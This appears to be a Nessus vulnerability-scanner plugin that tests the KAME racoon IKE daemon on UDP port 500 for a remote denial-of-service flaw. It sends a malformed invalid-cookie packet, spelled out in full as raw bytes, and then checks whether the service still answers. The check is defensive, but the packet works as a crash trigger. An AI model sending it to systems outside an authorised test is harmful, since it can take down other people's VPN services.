
Kame Racoon Invalid Cookie Handling Remote DoS


The remote system appears to have a problem with processing requests with invalid cookie values. At least one VPN product (racoon) demonstrates this flaw. Racoon is integrated with:

FreeBSD 4.0 and later; OpenBSD 2.7 and later; NetBSD 1.5 and later; BSD/OS 4.2 and later.

However, the bug has only been verified on FreeBSD systems.

An attacker may use this flaw to disable your VPN remotely.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Plugin registration. When Nessus loads the script with `description`
# set, only the metadata below is recorded and the script exits before
# any packet is sent.
if (description)
{
 script_id(12121);
 script_version("1.18");
 script_cvs_date("Date: 2018/08/13 14:32:36");


 script_name(english:"Kame Racoon Invalid Cookie Handling Remote DoS");
 script_summary(english:"Racoon invalid cookie malloc bug");

 script_set_attribute(attribute:"synopsis", value:"The remote server is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"The remote system appears to have a problem with processing requests
with invalid cookie values. At least one VPN product (racoon)
demonstrates this flaw. Racoon is integrated with:

FreeBSD 4.0 and beyond OpenBSD 2.7 and beyond NetBSD 1.5 and beyond
BSD/OS 4.2 and beyond

However, the bug has only been verified on FreeBSD systems.

An attacker may use this flaw to disable your VPN remotely.");
 script_set_attribute(attribute:"solution", value:
"If you are running racoon VPN, download and install the latest SNAP
kit from http://www.kame.net/. If you are running a non-racoon VPN
server that is crashing due to this check, consult your vendor for a
fix.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

 script_set_attribute(attribute:"plugin_publication_date", value:"2004/03/31");

 # The finding is inferred from the service no longer answering after the
 # probe, not confirmed against a version or vendor fix.
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # ACT_KILL_HOST: this check may take the target's IKE service (or host)
 # down; it is therefore also gated on the paranoid-report setting below.
 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 # Scheduler-level gate: the script is only launched when paranoid
 # reporting is enabled (re-checked at runtime via report_paranoia).
 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

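include("audit.inc");
include("global_settings.inc");

# Runtime gate matching the Settings/ParanoidReport key declared in the
# description block: the check is ACT_KILL_HOST and may take the target
# down, so it only runs at the highest report-paranoia level.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# IKE/ISAKMP is probed on UDP 500.
port = 500;

# Nothing to test unless the UDP port is known to be open; report the
# reason the same way the other early exits in this file do.
if (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, "UDP");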

# Two distinct 8-byte initiator cookies; one is prepended to the valid IKE
# packet below for each liveness probe (cookie2 spells "NESSUS.." in ASCII).
cookie1 = raw_string(0xFF,0x00,0xFE,0x01,0xFD,0x02,0xFC,0x03);
cookie2 = raw_string(0x4E,0x45,0x53,0x53,0x55,0x53,0x2E,0x2E);

# Body of the well-formed IKE packet used to check that the service is
# up; a cookie is prepended to it to form init1/init2 below.
init = raw_string(
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x50,0x00,0x00,0x01,0x34,
0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x01,0x28,0x01,0x01,0x00,0x01,
0x03,0x00,0x00,0x24,0x01,0x01,0x00,0x00,0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,
0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,
0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,0x02,0x01,0x00,0x00,0x80,0x01,0x00,0x05,
0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,
0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,0x03,0x01,0x00,0x00,
0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,
0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,
0x04,0x01,0x00,0x00,0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,
0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,
0x03,0x00,0x00,0x24,0x05,0x01,0x00,0x00,0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,
0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,
0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,0x06,0x01,0x00,0x00,0x80,0x01,0x00,0x05,
0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,
0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,0x07,0x01,0x00,0x00,
0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,
0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,0x00,0x00,0x00,0x24,
0x08,0x01,0x00,0x00,0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,
0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B);

# some hosts will not respond to second packet with the same Cookie ID.
# init1 is used for the first liveness probe, init2 for the one after the
# invalid-cookie packet, so the second probe carries a fresh cookie.
init1 = cookie1 + init;
init2 = cookie2 + init;

# The invalid-cookie request described in the plugin description. It is
# sent once, from a separate socket, between the two liveness probes; its
# leading 8 bytes match cookie1.
req=raw_string(
0xFF,0x00,0xFE,0x01,0xFD,0x02,0xFC,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xFF,0xFF,0xFF,0xFF,0xAA,0xAA,0x99,0x88,0x77,0x66,0x55,0x44,0x33,0x22,0x46,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F);


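# Step 1: make sure an IKE responder is listening by sending a well-formed
# packet (init1) and waiting for any reply. A silent port is not a finding;
# the liveness test below needs a baseline answer to compare against.
soc = open_sock_udp(port);
if (!soc)
	exit(1, "Could not open a UDP socket to port "+port+".");
send(socket:soc, data:init1);
r = recv(socket:soc, length:1024);
if (!r)
{
	close(soc);
	exit(0, "No answer to IKE packet on port "+port+".");
}

# Step 2: send the invalid-cookie packet from a separate socket so the
# original source port is kept for the liveness probe. The reply content
# is unused; waiting on recv() also leaves a timeout window before the
# next probe.
soc2 = open_sock_udp(port);
if (!soc2)
{
	close(soc);
	exit(1, "Could not open a second UDP socket to port "+port+".");
}
send(socket:soc2, data:req);
r = recv(socket:soc2, length:1024);
close(soc2);

# Step 3: see if the service is still alive, reusing the original socket
# and the second cookie (some hosts ignore a repeated cookie, see above).
# The probe is retried a few times so that a single lost UDP datagram does
# not turn into a false "service down" report on an ACT_KILL_HOST check.
alive = FALSE;
for (attempt = 0; attempt < 3; attempt++)
{
	send(socket:soc, data:init2);
	r = recv(socket:soc, length:1024);
	if (r)
	{
		alive = TRUE;
		break;
	}
}
close(soc);

if (!alive)
	security_warning(port:port, proto:"udp");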